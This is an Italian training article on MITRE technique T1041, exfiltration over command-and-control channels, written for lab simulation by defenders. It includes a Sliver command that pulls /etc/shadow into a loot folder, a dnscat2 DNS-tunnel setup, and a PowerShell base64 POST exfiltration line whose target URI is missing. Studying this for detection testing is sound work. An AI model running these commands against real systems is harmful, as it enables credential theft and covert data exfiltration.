Esfiltrazione sul Canale C2: Exfiltration Over C2 Channel (T1041)

L'esfiltrazione tramite il canale di comando e controllo rappresenta una delle tecniche più diffuse e insidiose nel panorama delle minacce moderne. Il principio è semplice quanto efficace: anziché aprire un secondo canale di comunicazione per trasferire dati rubati — operazione che potrebbe attirare l'attenzione dei difensori — l'avversario riutilizza la connessione già stabilita con la propria infrastruttura C2. I dati sottratti vengono codificati e incapsulati nello stesso protocollo usato per ricevere comandi, confondendosi nel traffico legittimo.

Classificata nella tattica TA0010 (Exfiltration), questa tecnica si colloca nella fase finale della kill chain, quando l'attaccante ha già raggiunto i propri obiettivi di raccolta e necessita solo di un veicolo per portare fuori i dati. I numeri parlano da soli: 25 gruppi APT, 156 software, 10 campagne documentate e 2 mitigazioni censite dimostrano quanto questa tecnica sia trasversale, adottata da attori che spaziano dal cybercrime finanziario allo spionaggio statale.

Il motivo della sua popolarità è strutturale. Se un impianto malware ha già superato i controlli perimetrali per stabilire il C2, ogni pacchetto aggiuntivo che transita sullo stesso canale gode della stessa copertura. I protocolli più sfruttati includono HTTP/HTTPS, DNS, SMTP e persino API cloud come Dropbox o OneDrive, rendendo il traffico esfiltrato quasi indistinguibile da normali operazioni di rete.

La simulazione di questa tecnica in laboratorio è essenziale per validare la capacità del blue team di rilevare trasferimenti anomali su canali C2 già attivi. L'obiettivo non è esfiltrare dati reali, ma generare pattern di traffico realistici che mettano alla prova regole SIEM, soglie volumetriche e analisi comportamentali.

Il framework Sliver (open source) offre un meccanismo nativo per questa tecnica. Dopo aver generato un impianto e ottenuto una sessione attiva, il comando download trasferisce file dall'host compromesso al server C2 attraverso lo stesso canale mTLS, HTTP o DNS già in uso. In una sessione interattiva Sliver è sufficiente:

download /etc/shadow /tmp/loot/

Per scenari più articolati, Empire (open source) consente di raccogliere informazioni tramite moduli post-exploitation e inviarle automaticamente al listener. Il modulo collection/file_finder cerca file per estensione e dimensione, mentre i dati raccolti fluiscono verso il C2 senza apertura di nuovi socket. Questo replica esattamente il pattern osservato nella campagna Frankenstein (C0001), dove gli attori usavano Empire per raccogliere e trasferire informazioni al proprio C2.

Per simulare esfiltrazione su canali DNS, dnscat2 (open source) incapsula dati in query DNS TXT o CNAME. Dopo aver avviato il server con:

ruby dnscat2.rb

dal client si caricano file che vengono frammentati in query DNS, replicando il comportamento di malware come Shark e Kevin che utilizzano DNS come canale C2 ed esfiltrazione.

Su ambienti Windows, Cobalt Strike (a pagamento) è lo standard de facto per questa simulazione, come conferma il suo uso documentato da parte di Chimera per esfiltrare dati via beacon. Il comando download del beacon trasferisce file attraverso il canale HTTP/HTTPS o DNS già stabilito.

Per testare soglie volumetriche, è utile generare trasferimenti graduali. Con PowerShell si può creare un file di dimensione controllata e inviarlo via HTTP POST al proprio listener:

$data = [Convert]::ToBase64String((Get-Content -Path C:\test\sample.dat -Encoding Byte)); Invoke-WebRequest -Uri -Method POST -Body $data

Questo approccio replica il comportamento di malware come StrelaStealer, Squirrelwaffle e BlackByte, che inviano dati codificati in base64 tramite POST HTTP al C2. Variando la dimensione del payload e la frequenza di invio, si possono calibrare le soglie di detection senza rischiare falsi negativi in produzione.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.